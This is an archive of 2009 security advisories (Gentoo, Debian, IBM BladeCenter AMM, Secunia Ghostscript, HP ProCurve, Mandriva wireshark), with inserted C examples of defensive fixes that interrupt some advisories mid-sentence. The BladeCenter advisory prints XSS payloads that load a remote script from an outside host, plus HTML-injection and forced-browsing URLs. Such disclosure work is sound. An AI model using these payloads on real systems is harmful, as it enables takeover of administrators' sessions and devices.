All MIT Kerberos 5 users should upgrade to the latest version:

# emerge --sync
# emerge --ask --oneshot --verbose =app-crypt/mit-krb5-1.6.3-r6

References
==

  [ 1 ] CVE-2009-0844
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0844
  [ 2 ] CVE-2009-0845
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0845
  [ 3 ] CVE-2009-0846
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0846
  [ 4 ] CVE-2009-0847
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0847

Availability


This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200904-09.xml

Concerns?
=

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
secur...@gentoo.org or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
===

Copyright 2009 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5




IBM BladeCenter Advanced Management Module Multiple vulnerabilities

2009-04-09 Thread Henri Lindberg - Smilehouse Oy
   Louhi Networks Information Security Research
Security Advisory


 Advisory: IBM BladeCenter Advanced Management Module
   Multiple vulnerabilities
   (XSS type 2 & 1, CSRF, Information Disclosure)
 Release Date: 2009-04-09
Last Modified: 2009-04-09
  Authors: Henri Lindberg [henri.lindb...@louhi.fi], CISA

   Device: IBM BladeCenter H AMM
   Main application: BPET36H
   Released: 03-20-08
   Rev:  54
 Risk: Low - Moderate
   High if Web Access is in active use and
   access to login page is unrestricted
Vendor Status: Vendor notified, patch available.
   References: http://www.louhinetworks.fi/advisory/ibm_090409.txt

Affected devices (from vendor):
  IBM BladeCenter E (1881, 7967, 8677)
  IBM BladeCenter H (7989, 8852)
  IBM BladeCenter HT (8740, 8750)
  IBM BladeCenter S (1948, 8886)
  IBM BladeCenter T (8720, 8730)
  IBM BladeCenter JS12 (7998)
  IBM BladeCenter JS21 (7988, 8844)
  IBM BladeCenter JS22 (7998)
  IBM BladeCenter HC10 (7996)
  IBM BladeCenter HS12 (8014, 1916, 8028)
  IBM BladeCenter HS20 (1883, 8843)
  IBM BladeCenter HS21 (8853, 1885)
  IBM BladeCenter HS21 XM (7995, 1915)
  IBM BladeCenter LS20 (8850)
  IBM BladeCenter LS21 (7971)
  IBM BladeCenter LS41 (7972)
  IBM BladeCenter QS21 (0792)
  IBM BladeCenter QS22 (0793)

Overview:

   Quotes from

http://www-03.ibm.com/systems/bladecenter/hardware/chassis/bladeh/index.html

   In today’s high-demand enterprise environment, organizations
need a reliable infrastructure to run compute-intensive
applications with minimal maintenance and downtime.
IBM BladeCenter H is a powerful platform built with the
enterprise customer in mind, providing industry-leading performance,
innovative architecture and a solid foundation for virtualization.

   Provides easy integration to promote innovation and help manage
growth, complexity and risk

   During a quick overview of BladeCenter AMM web access, it was
   discovered that web administration interface has multiple
   vulnerabilities regarding input and request validation.

Details:

   Cross Site Scripting
   

   Type 2:
   ---
   Most serious issue discovered was the persistent XSS
   vulnerability on the event log page resulting from
   displaying unsanitized user input received from an invalid
   login attempt.

   This can be exploited without valid credentials or social
   engineering. Access to device administration IP address is
   needed and an administrator has to view event log at some point,
   however.

   Successful attack requires that an administrator visits event
   log page, thus enabling the attacker to control the chassis
   and blade configuration by running the injected content which
   is interpreted by the administrator's browser.

   For example, all blades can be shut down or new administrative
   users can be added, depending on administrator's access rights.

   Unsuccessful login attempts are displayed without HTML encoding
   or input sanitation in the event log. It is possible to inject
   a reference to a remote javascript file by using eg following
   username:
   </script><script src=//l7.fi></script><script>

   Notes:
   If user input contains /script, dynamic javascript is spilled
   out on the page and it is quite easy to mess up formatting
   of the event log page.

   Log can be cleared by an authenticated administrator from URL:
   http://1.2.3.4/private/clearlog

   Event log javascript format:
   parent.LogEntryArray[i++] = new LogEntry( 1,2,"Audit",
   "SN#420420313370","09/09/08","04:20:42","Remote login failed
   for user '</script><script src='//l7.fi'></script><script>' from
   Web at IP 1.2.3.4");

   HTML-injection can be performed for example with the following
   username: <a href=private/clearlog>Mallory</a>

   This results in:
   <TD>Remote login failed for user '<a href='private/clearlog'>
   Mallory</a>' from Web at IP 1.2.3.4</TD>

   Entries from event log are also displayed on the AMM Service
   Data page.

   Type 1:
   ---
   File manager displays user input on the page as is.

   Successful exploitation requires social engineering
   an authenticated administrator to visit the hostile URL.

   Example URL:
   http://1.2.3.4/private/file_management.ssi?
   PATH=/etc<script%20src=http://l7.fi></script>

   Information Disclosure
   ==

   A readonly operator (for example, a Blade operator with
   a scope assignment to one Blade) can view security
   permissions of other users (access roles and scopes) by
   forcefully browsing to their respective login profile pages:

   http://1.2.3.4/private/login.ssi?WEBINDEX=n&JUNK=1
   where n is the assigned integer value (1..12) of the user
   account

   Cross Site Request Forgery
   ==

   BladeCenter AMM does not validate the origin of an HTTP request.

   If attacker is able to lure or force an 

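Added example (not IBM firmware code and not part of the advisory above): the event-log page quoted in the advisory places the failed username inside a JavaScript string literal within a <script> block, and the Service Data page shows the same entries as HTML text. The HTML tokenizer ends a script block at the first "</script>" regardless of JavaScript quoting, so the username has to be escaped for the JavaScript-string context (here as \xNN sequences, which the JavaScript engine decodes back so the log still shows what was typed) and separately HTML-escaped where it lands in a <TD>. The LogEntry call shape, the SN# value and the payload strings are the advisory's; the function names, buffer sizes and the decision to escape the IP field through the same routine are this example's own choices.

```c
#include <stdio.h>
#include <string.h>

/* Escape untrusted text for a JavaScript string literal that sits inside an
 * HTML <script> block.  The HTML tokenizer ends the block at the first
 * "</script>" no matter how JavaScript quotes it, so every character that
 * could form markup or end the literal is emitted as \xNN; the JavaScript
 * engine decodes it back, so the log still shows the attacker's username.
 * Returns bytes written (excluding NUL) or -1 if the buffer is too small. */
int js_string_escape(const char *in, char *out, size_t outlen) {
    static const char hex[] = "0123456789ABCDEF";
    size_t n = 0;
    if (outlen == 0) return -1;
    for (const unsigned char *p = (const unsigned char *)in; *p; p++) {
        unsigned char c = *p;
        int escape = c < 0x20 || c > 0x7E || strchr("<>&'\"\\/", (int)c) != NULL;
        if (escape) {
            if (n + 4 > outlen - 1) return -1;
            out[n++] = '\\'; out[n++] = 'x';
            out[n++] = hex[c >> 4]; out[n++] = hex[c & 0x0F];
        } else {
            if (n + 1 > outlen - 1) return -1;
            out[n++] = (char)c;
        }
    }
    out[n] = '\0';
    return (int)n;
}

/* Escape untrusted text for an HTML text node, the context of the
 * event-log <TD> cell and of the AMM Service Data page. */
int html_escape(const char *in, char *out, size_t outlen) {
    size_t n = 0;
    if (outlen == 0) return -1;
    for (const char *p = in; *p; p++) {
        const char *rep = NULL;
        switch (*p) {
        case '<':  rep = "&lt;";   break;
        case '>':  rep = "&gt;";   break;
        case '&':  rep = "&amp;";  break;
        case '"':  rep = "&quot;"; break;
        case '\'': rep = "&#39;";  break;
        }
        size_t len = rep ? strlen(rep) : 1;
        if (n + len > outlen - 1) return -1;
        if (rep) memcpy(out + n, rep, len); else out[n] = *p;
        n += len;
    }
    out[n] = '\0';
    return (int)n;
}

/* Emit one event-log line in the shape quoted in the advisory, with both
 * attacker-influenced fields escaped for the JavaScript-string context.
 * Returns the line length or -1 on overflow. */
int render_log_entry(const char *username, const char *ip, char *out, size_t outlen) {
    char user_esc[512], ip_esc[64];
    if (js_string_escape(username, user_esc, sizeof user_esc) < 0 ||
        js_string_escape(ip, ip_esc, sizeof ip_esc) < 0)
        return -1;
    int r = snprintf(out, outlen,
        "parent.LogEntryArray[i++] = new LogEntry(1,2,\"Audit\",\"SN#420420313370\","
        "\"09/09/08\",\"04:20:42\",\"Remote login failed for user '%s' from Web at IP %s\");",
        user_esc, ip_esc);
    return (r < 0 || (size_t)r >= outlen) ? -1 : r;
}

/* 1 if fn(in) produces exactly `expected` (used by the checks below). */
int escapes_to(const char *in, const char *expected,
               int (*fn)(const char *, char *, size_t)) {
    char buf[1024];
    return fn(in, buf, sizeof buf) >= 0 && strcmp(buf, expected) == 0;
}

/* Render the advisory's username payload; 1 if no raw '<' survives, so
 * the emitted line can no longer close the enclosing <script> block. */
int demo_payload_neutralised(void) {
    char line[1024];
    const char *payload = "</script><script src=//l7.fi></script><script>";
    if (render_log_entry(payload, "1.2.3.4", line, sizeof line) < 0) return 0;
    return strchr(line, '<') == NULL;
}

int main(void) {
    char line[1024];
    render_log_entry("</script><script src=//l7.fi></script><script>", "1.2.3.4",
                     line, sizeof line);
    puts(line);
    return 0;
}
```

Clearing the log (the /private/clearlog request the advisory mentions) is not a fix: the entry is re-created by the next failed login, so the encoding has to happen where the entry is rendered.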
[SECURITY] [DSA 1767-1] New multipath-tools packages fix denial of service

2009-04-09 Thread Nico Golde
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- --
Debian Security Advisory DSA-1767-1secur...@debian.org
http://www.debian.org/security/ Nico Golde
April 9th, 2009 http://www.debian.org/security/faq
- --

Package: multipath-tools
Vulnerability  : insecure file permissions
Problem type   : local
Debian-specific: no
CVE ID : CVE-2009-0115
Debian Bug : 522813


It was discovered that multipathd of multipath-tools, a tool-chain to manage
disk multipath device maps, uses insecure permissions on its unix domain
control socket, which enables local attackers to issue commands to multipathd,
prevent access to storage devices or corrupt file system data.


For the oldstable distribution (etch), this problem has been fixed in
version 0.4.7-1.1etch2.

For the stable distribution (lenny), this problem has been fixed in
version 0.4.8-14+lenny1.

For the testing distribution (squeeze), this problem will be fixed soon.

For the unstable distribution (sid), this problem has been fixed in
version 0.4.8-15.


We recommend that you upgrade your multipath-tools packages.

Upgrade instructions
- 

wget <url>
will fetch the file for you
dpkg -i <file.deb>
will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
will update the internal database
apt-get upgrade
will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian GNU/Linux 4.0 alias etch
- ---

Debian (oldstable)
- --

Oldstable updates are available for alpha, amd64, arm, hppa, i386, ia64, mips, 
mipsel, powerpc, s390 and sparc.

Source archives:

  
http://security.debian.org/pool/updates/main/m/multipath-tools/multipath-tools_0.4.7-1.1etch2.dsc
Size/MD5 checksum:  794 96af45800ec71a9fcf8f811416ff90e7
  
http://security.debian.org/pool/updates/main/m/multipath-tools/multipath-tools_0.4.7.orig.tar.gz
Size/MD5 checksum:   179914 b14f35444f6fee34b6be49a79ebe9439
  
http://security.debian.org/pool/updates/main/m/multipath-tools/multipath-tools_0.4.7-1.1etch2.diff.gz
Size/MD5 checksum:25941 971e214f6a43d817da8da4dcc3763443

alpha architecture (DEC Alpha)

  
http://security.debian.org/pool/updates/main/m/multipath-tools/multipath-tools_0.4.7-1.1etch2_alpha.deb
Size/MD5 checksum:   189648 b656f97eb5932ef8a5c7da0f82a84137

amd64 architecture (AMD x86_64 (AMD64))

  
http://security.debian.org/pool/updates/main/m/multipath-tools/multipath-tools_0.4.7-1.1etch2_amd64.deb
Size/MD5 checksum:   176688 a51f613920761e339ed609d5894ce7eb

hppa architecture (HP PA RISC)

  
http://security.debian.org/pool/updates/main/m/multipath-tools/multipath-tools_0.4.7-1.1etch2_hppa.deb
Size/MD5 checksum:   173368 2e4e0cd06f1da7b52763595e61ba500d

i386 architecture (Intel ia32)

  
http://security.debian.org/pool/updates/main/m/multipath-tools/multipath-tools_0.4.7-1.1etch2_i386.deb
Size/MD5 checksum:   150996 48c1d3875c6d379fc0a62e8c1e28666f

mips architecture (MIPS (Big Endian))

  
http://security.debian.org/pool/updates/main/m/multipath-tools/multipath-tools_0.4.7-1.1etch2_mips.deb
Size/MD5 checksum:   178114 3fbf325989232f9d696a3bcfbfdf89d1

mipsel architecture (MIPS (Little Endian))

  
http://security.debian.org/pool/updates/main/m/multipath-tools/multipath-tools_0.4.7-1.1etch2_mipsel.deb
Size/MD5 checksum:   176212 d72b286ae168caa5947cab12db6e8e2b

powerpc architecture (PowerPC)

  
http://security.debian.org/pool/updates/main/m/multipath-tools/multipath-tools_0.4.7-1.1etch2_powerpc.deb
Size/MD5 checksum:   161776 923e02c8131bbfd298bd2958637fc90b

s390 architecture (IBM S/390)

  
http://security.debian.org/pool/updates/main/m/multipath-tools/multipath-tools_0.4.7-1.1etch2_s390.deb
Size/MD5 checksum:   185228 b91cf8601d239237884cd0e03fa67b60

sparc architecture (Sun SPARC/UltraSPARC)

  
http://security.debian.org/pool/updates/main/m/multipath-tools/multipath-tools_0.4.7-1.1etch2_sparc.deb
Size/MD5 checksum:   154464 a36b4c818a9dbe7b7c8e61722a70dee6


Debian GNU/Linux 5.0 alias lenny
- 

Debian (stable)
- ---

Stable updates are available for alpha, amd64, arm, armel, hppa, i386, ia64, 
mips, mipsel, powerpc, s390 and sparc.

Source archives:

  
http://security.debian.org/pool/updates/main/m/multipath-tools/multipath-tools_0.4.8-14+lenny1.dsc
Size/MD5 checksum: 1375 04c428b50412dcfe7cefecce779bdd82
  
http://security.debian.org/pool/updates/main/m/multipath-tools/multipath-tools_0.4.8-14+lenny1.diff.gz
Size/MD5 checksum:22746 ec09a8b773c890812f68c431024b89b2
  

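Added example, not multipathd's code and not the packaged Debian fix: a generic way to create a filesystem unix-domain control socket that only its owner can connect to, plus the audit check an administrator can run against an existing socket path. On Linux, connect() to a filesystem socket requires write permission on the socket inode, and the inode is created with 0777 & ~umask at bind() time, so the example tightens the umask around bind() and then verifies the resulting mode with lstat(). The directory and socket names are constructed for the example.

```c
#define _DEFAULT_SOURCE 1
#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/socket.h>
#include <sys/stat.h>
#include <sys/un.h>
#include <unistd.h>

/* On Linux, connect() to a filesystem unix socket needs write permission
 * on the socket inode, so a socket writable by group or others lets any
 * local user issue control commands.  Safe here means owner-only write. */
int socket_mode_is_safe(mode_t mode) {
    return (mode & (S_IWGRP | S_IWOTH)) == 0;
}

/* Audit an existing control socket path: 1 = socket with safe mode,
 * 0 = socket with unsafe mode, -1 = missing or not a socket. */
int check_control_socket(const char *path) {
    struct stat st;
    if (lstat(path, &st) != 0 || !S_ISSOCK(st.st_mode)) return -1;
    return socket_mode_is_safe(st.st_mode) ? 1 : 0;
}

/* Create a listening unix-domain socket reachable only by its owner.  The
 * socket inode gets 0777 & ~umask at bind() time, so the umask is
 * tightened around bind() and restored afterwards.  Returns the fd or -1. */
int create_control_socket(const char *path) {
    struct sockaddr_un sa;
    if (strlen(path) >= sizeof sa.sun_path) { errno = ENAMETOOLONG; return -1; }
    int fd = socket(AF_UNIX, SOCK_STREAM, 0);
    if (fd < 0) return -1;
    memset(&sa, 0, sizeof sa);
    sa.sun_family = AF_UNIX;
    strcpy(sa.sun_path, path);
    unlink(path);                      /* remove a stale socket from a previous run */
    mode_t old = umask(0177);
    int rc = bind(fd, (struct sockaddr *)&sa, sizeof sa);
    umask(old);
    if (rc != 0 || listen(fd, 5) != 0) { close(fd); unlink(path); return -1; }
    return fd;
}

/* Self-contained run: create the hardened socket in a fresh temporary
 * directory, audit it, then widen it to 0666 to stand in for the insecure
 * permissions the advisory describes, and audit again.  Returns 1 when the
 * hardened socket passes and the widened one is flagged; -1 on setup failure. */
int demo_socket_permissions(void) {
    char dir[] = "/tmp/ctlsockXXXXXX";   /* constructed example location */
    char path[64];
    if (mkdtemp(dir) == NULL) return -1;
    snprintf(path, sizeof path, "%s/ctl.sock", dir);
    int fd = create_control_socket(path);
    if (fd < 0) { rmdir(dir); return -1; }
    int hardened = check_control_socket(path);   /* expected 1 */
    chmod(path, 0666);
    int widened = check_control_socket(path);    /* expected 0 */
    close(fd); unlink(path); rmdir(dir);
    return hardened == 1 && widened == 0;
}

int main(void) {
    printf("hardened socket passes, widened socket flagged: %s\n",
           demo_socket_permissions() == 1 ? "yes" : "no");
    return 0;
}
```

The mode check alone is not sufficient on its own if the socket lives in a directory other users can rename or replace entries in; keeping the socket in a root-owned 0700 directory (or using SO_PEERCRED on the accepting side) closes that gap, and either belongs alongside the umask fix rather than instead of it.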
[ GLSA 200904-10 ] Avahi: Denial of Service

2009-04-09 Thread Robert Buchholz
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory   GLSA 200904-10
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
 Title: Avahi: Denial of Service
  Date: April 08, 2009
  Bugs: #260971
ID: 200904-10

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis


An error in Avahi might lead to a Denial of Service via network and CPU
consumption.

Background
==

Avahi is a system that facilitates service discovery on a local
network.

Affected packages
=

---
 Package/   Vulnerable   /  Unaffected
---
  1  net-dns/avahi                       < 0.6.24-r2               >= 0.6.24-r2

Description
===

Rob Leslie reported that the
originates_from_local_legacy_unicast_socket() function in
avahi-core/server.c does not account for the network byte order of a
port number when processing incoming multicast packets, leading to a
multicast packet storm.

Impact
==

A remote attacker could send specially crafted legacy unicast mDNS
query packets to the Avahi daemon, resulting in a Denial of Service due
to network bandwidth and CPU consumption.

Workaround
==

There is no known workaround at this time.

Resolution
==

All Avahi users should upgrade to the latest version:

# emerge --sync
# emerge --ask --oneshot --verbose =net-dns/avahi-0.6.24-r2

References
==

  [ 1 ] CVE-2009-0758
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0758

Availability


This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200904-10.xml

Concerns?
=

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
secur...@gentoo.org or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
===

Copyright 2009 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5



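Added illustration of the byte-order mistake the GLSA above describes; this is not Avahi's code, only a reduced model of it. A port obtained from a socket address (as getsockname() returns it) is stored in network byte order, while a port the packet parser has already converted sits in host order. Comparing the two without ntohs() makes the "is this my own legacy-unicast socket?" test fail for the daemon's own traffic on a little-endian host, and succeed for a remote packet carrying the byte-swapped port instead. The function names and the port value are constructed for the example.

```c
#include <arpa/inet.h>   /* htons(), ntohs() */
#include <netinet/in.h>  /* struct sockaddr_in, in_port_t */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Stand-in for the address getsockname() fills in for the daemon's own
 * legacy-unicast socket: the kernel stores sin_port in network byte order.
 * The port number is a constructed example value. */
static struct sockaddr_in local_legacy_unicast_addr(uint16_t port_host_order) {
    struct sockaddr_in sa;
    memset(&sa, 0, sizeof sa);
    sa.sin_family = AF_INET;
    sa.sin_port = htons(port_host_order);
    return sa;
}

/* Vulnerable comparison: raw sin_port (network order) against a source
 * port the packet parser has already converted to host order.  On a
 * little-endian host this is false for the daemon's own packets and true
 * only for a packet whose source port is the byte-swapped value. */
int originates_locally_vuln(uint16_t local_port, uint16_t pkt_src_port) {
    struct sockaddr_in lsa = local_legacy_unicast_addr(local_port);
    return lsa.sin_port == pkt_src_port;
}

/* Fixed comparison: bring sin_port to host order before comparing. */
int originates_locally_fixed(uint16_t local_port, uint16_t pkt_src_port) {
    struct sockaddr_in lsa = local_legacy_unicast_addr(local_port);
    return ntohs(lsa.sin_port) == pkt_src_port;
}

/* The source port an attacker would put on the wire to satisfy the
 * vulnerable comparison for a given local port on a little-endian host. */
uint16_t swap16(uint16_t v) {
    return (uint16_t)((v << 8) | (v >> 8));
}

int main(void) {
    uint16_t local = 32768;               /* constructed example port */
    uint16_t crafted = swap16(local);     /* 128 */
    printf("own packet    vuln=%d fixed=%d\n",
           originates_locally_vuln(local, local), originates_locally_fixed(local, local));
    printf("crafted port  vuln=%d fixed=%d\n",
           originates_locally_vuln(local, crafted), originates_locally_fixed(local, crafted));
    return 0;
}
```

The same mistake is invisible on a big-endian host, where host and network order coincide, which is one reason byte-order bugs survive testing; the checks below are written to hold on either.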

Secunia Research: Ghostscript jbig2dec JBIG2 Processing Buffer Overflow

2009-04-09 Thread Secunia Research
== 

 Secunia Research 09/04/2009

   - Ghostscript jbig2dec JBIG2 Processing Buffer Overflow -

== 
Table of Contents

Affected Software1
Severity.2
Vendor's Description of Software.3
Description of Vulnerability.4
Solution.5
Time Table...6
Credits..7
References...8
About Secunia9
Verification10

== 
1) Affected Software 

* Ghostscript version 8.64

NOTE: Other versions may also be affected.

== 
2) Severity 

Rating: Highly critical 
Impact: System access
Where:  Remote

== 
3) Vendor's Description of Software 

An interpreter for the PostScript (TM) language, with the ability to 
convert PostScript language files to many raster formats, view them 
on displays, and print them on printers that don't have PostScript 
language capability built in; An interpreter for Portable Document 
Format (PDF) files, with the same abilities; ...

Product Link:
http://www.ghostscript.com/Ghostscript.html

== 
4) Description of Vulnerability

Secunia Research has discovered a vulnerability in Ghostscript, which 
can be exploited by malicious people to potentially compromise a
user's system.

The vulnerability is caused due to a boundary error in the included 
jbig2dec library while decoding JBIG2 symbol dictionary segments. 
This can be exploited to cause a heap-based buffer overflow via a 
specially crafted PDF file.

Successful exploitation may allow execution of arbitrary code.

== 
5) Solution 

Do not process untrusted PDF files.

== 
6) Time Table 

26/03/2009 - Vendor notified.
26/03/2009 - vendor-sec notified.
02/04/2009 - Vendor response.
09/04/2009 - Public disclosure.

== 
7) Credits 

Discovered by Alin Rad Pop, Secunia Research.

== 
8) References

The Common Vulnerabilities and Exposures (CVE) project has assigned
CVE-2009-0196 for the vulnerability.

== 
9) About Secunia

Secunia offers vulnerability management solutions to corporate
customers with verified and reliable vulnerability intelligence
relevant to their specific system configuration:

http://secunia.com/advisories/business_solutions/

Secunia also provides a publicly accessible and comprehensive advisory
database as a service to the security community and private 
individuals, who are interested in or concerned about IT-security.

http://secunia.com/advisories/

Secunia believes that it is important to support the community and to
do active vulnerability research in order to aid improving the 
security and reliability of software in general:

http://secunia.com/secunia_research/

Secunia regularly hires new skilled team members. Check the URL below
to see currently vacant positions:

http://secunia.com/corporate/jobs/

Secunia offers a FREE mailing list called Secunia Security Advisories:

http://secunia.com/advisories/mailing_lists/

== 
10) Verification 

Please verify this advisory by visiting the Secunia website:
http://secunia.com/secunia_research/2009-21/

Complete list of vulnerability reports published by Secunia Research:
http://secunia.com/secunia_research/

==


[security bulletin] HPSBMA02420 SSRT071458 rev.1 - HP ProCurve Manager and HP ProCurve Manager Plus, Remote Unauthorized Access to Data

2009-04-09 Thread security-alert
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: c01713073
Version: 1

HPSBMA02420 SSRT071458 rev.1 - HP ProCurve Manager and HP ProCurve Manager 
Plus, Remote Unauthorized Access to Data

NOTICE: The information in this Security Bulletin should be acted upon as soon 
as possible.

Release Date: 2009-04-08
Last Updated: 2009-04-08

Potential Security Impact: Remote unauthorized access to data

Source: Hewlett-Packard Company, HP Software Security Response Team

VULNERABILITY SUMMARY
A potential security vulnerability has been identified in HP ProCurve Manager 
and HP ProCurve Manager Plus. The vulnerability could allow remote unauthorized 
access to data on the ProCurve Manager server.

References: CVE-2007-4514

SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.
HP ProCurve Manager v 2.3 and earlier 
HP ProCurve Manager Plus v 2.3 and earlier 

BACKGROUND

CVSS 2.0 Base Metrics 
===
Reference Base Vector   Base Score 
CVE-2007-4514 (AV:N/AC:L/Au:N/C:P/I:N/A:N)  5.0
===
Information on CVSS is documented in HP Customer Notice: HPSN-2008-002.
 
RESOLUTION

HP has made the following software updates available to resolve the 
vulnerability.

The updates are available from 
http://www.hp.com/rnd/software/network_management.htm 

ProCurve Manager 2.322/ProCurve Manager Plus 2.322 (Auto Update 10)
 
ProCurve Manager 2.321/ProCurve Manager Plus 2.321 (Auto Update 10)
 


PRODUCT SPECIFIC INFORMATION 
None

HISTORY 
Version:1 (rev.1) - 8 April 2009 Initial release

Third Party Security Patches: Third party security patches that are to be 
installed on systems running HP software products should be applied in 
accordance with the customer's patch management policy. 

Support: For further information, contact normal HP Services support channel.

Report: To report a potential security vulnerability with any HP supported 
product, send Email to: security-al...@hp.com 
It is strongly recommended that security related information being communicated 
to HP be encrypted using PGP, especially exploit information. 
To get the security-alert PGP key, please send an e-mail message as follows:
  To: security-al...@hp.com 
  Subject: get key

Subscribe: To initiate a subscription to receive future HP Security Bulletins 
via Email: 
http://h30046.www3.hp.com/driverAlertProfile.php?regioncode=NAlangcode=USENGjumpid=in_SC-GEN__driverITRCtopiccode=ITRC
 
On the web page: ITRC security bulletins and patch sign-up 
Under Step1: your ITRC security bulletins and patches 
  - check ALL categories for which alerts are required and continue.
Under Step2: your ITRC operating systems 
  - verify your operating system selections are checked and save.


To update an existing subscription: http://h30046.www3.hp.com/subSignIn.php 
Log in on the web page: Subscriber's choice for Business: sign-in. 
On the web page: Subscriber's Choice: your profile summary - use Edit Profile 
to update appropriate sections.


To review previously published Security Bulletins visit: 
http://www.itrc.hp.com/service/cki/secBullArchive.do 


* The Software Product Category that this Security Bulletin relates to is 
represented by the 5th and 6th characters of the Bulletin number in the title: 

GN = HP General SW 
MA = HP Management Agents 
MI = Misc. 3rd Party SW
MP = HP MPE/iX
NS = HP NonStop Servers
OV = HP OpenVMS
PI = HP Printing & Imaging
ST = HP Storage SW
TL = HP Trusted Linux
TU = HP Tru64 UNIX
UX = HP-UX
VV = HP VirtualVault

System management and security procedures must be reviewed frequently to 
maintain system integrity. HP is continually reviewing and enhancing the 
security features of software products to provide customers with current secure 
solutions.


HP is broadly distributing this Security Bulletin in order to bring to the 
attention of users of the affected HP products the important security 
information contained in this Bulletin. HP recommends that all users determine 
the applicability of this information to their individual situations and take 
appropriate action. HP does not warrant that this information is necessarily 
accurate or complete for all user situations and, consequently, HP will not be 
responsible for any damages resulting from user's use or disregard of the 
information provided in this Bulletin. To the extent permitted by law, HP 
disclaims all warranties, either express or implied, including the warranties 
of merchantability and fitness for a particular purpose, title and 
non-infringement.

©Copyright 2009 Hewlett-Packard Development Company, L.P. 

Hewlett-Packard Company shall not be liable for technical or editorial errors 
or omissions contained herein. The information provided is provided as is 
without warranty of any kind. To the extent permitted by law, neither HP or its 
affiliates, subcontractors or suppliers will 

[ MDVSA-2009:088 ] wireshark

2009-04-09 Thread security

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

 ___

 Mandriva Linux Security Advisory MDVSA-2009:088
 http://www.mandriva.com/security/
 ___

 Package : wireshark
 Date: April 9, 2009
 Affected: 2008.1, 2009.0, Corporate 4.0
 ___

 Problem Description:

 Multiple vulnerabilities have been identified and corrected in
 wireshark:
 
  o The PROFINET dissector was vulnerable to a format string overflow
  (CVE-2009-1210).
 
  o The Check Point High-Availability Protocol (CPHAP) dissector could
  crash (CVE-2009-1268).
 
  o Wireshark could crash while loading a Tektronix .rf5 file
  (CVE-2009-1269).
 
 This update provides Wireshark 1.0.7, which is not vulnerable to
 these issues.
 ___

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1210
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1268
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1269
 http://www.wireshark.org/security/wnpa-sec-2009-02.html
 ___

 Updated Packages:

 Mandriva Linux 2008.1:
 1dc62d022c4cbaa5ca9b07e089cd2a12  
2008.1/i586/dumpcap-1.0.7-0.1mdv2008.1.i586.rpm
 56a350f069b514514615d58a2c4d2cc0  
2008.1/i586/libwireshark0-1.0.7-0.1mdv2008.1.i586.rpm
 6b77a007c2f75ab0c048891ce01935ad  
2008.1/i586/libwireshark-devel-1.0.7-0.1mdv2008.1.i586.rpm
 0362de945cda3c60f97de2ffecc9cc62  
2008.1/i586/rawshark-1.0.7-0.1mdv2008.1.i586.rpm
 951fcc1d89f98da0a5eb4b9a40304d37  
2008.1/i586/tshark-1.0.7-0.1mdv2008.1.i586.rpm
 72feaee83f92f0889450c962b7620016  
2008.1/i586/wireshark-1.0.7-0.1mdv2008.1.i586.rpm
 d4792c75c5dbf8f8d01f98a6bd03abf9  
2008.1/i586/wireshark-tools-1.0.7-0.1mdv2008.1.i586.rpm 
 cc39d293bcdde09757d7c8eee9cf09fc  
2008.1/SRPMS/wireshark-1.0.7-0.1mdv2008.1.src.rpm

 Mandriva Linux 2008.1/X86_64:
 bc85820ec0857eeccdc7a6beb33512c1  
2008.1/x86_64/dumpcap-1.0.7-0.1mdv2008.1.x86_64.rpm
 33d696120c8a6b2456cf32986e958d6a  
2008.1/x86_64/lib64wireshark0-1.0.7-0.1mdv2008.1.x86_64.rpm
 c702bb0c37d362ad428020fd3504d14d  
2008.1/x86_64/lib64wireshark-devel-1.0.7-0.1mdv2008.1.x86_64.rpm
 2fdb45d92da41b695cfa5c4312f754b0  
2008.1/x86_64/rawshark-1.0.7-0.1mdv2008.1.x86_64.rpm
 622105a108c69497f97fa029545112fe  
2008.1/x86_64/tshark-1.0.7-0.1mdv2008.1.x86_64.rpm
 10f2f59bc26917a1345bc96eced4bdde  
2008.1/x86_64/wireshark-1.0.7-0.1mdv2008.1.x86_64.rpm
 f7bc70beed52589f61f579629a1c39c8  
2008.1/x86_64/wireshark-tools-1.0.7-0.1mdv2008.1.x86_64.rpm 
 cc39d293bcdde09757d7c8eee9cf09fc  
2008.1/SRPMS/wireshark-1.0.7-0.1mdv2008.1.src.rpm

 Mandriva Linux 2009.0:
 5f374dee7a3e806aa8f55e222cf7a875  
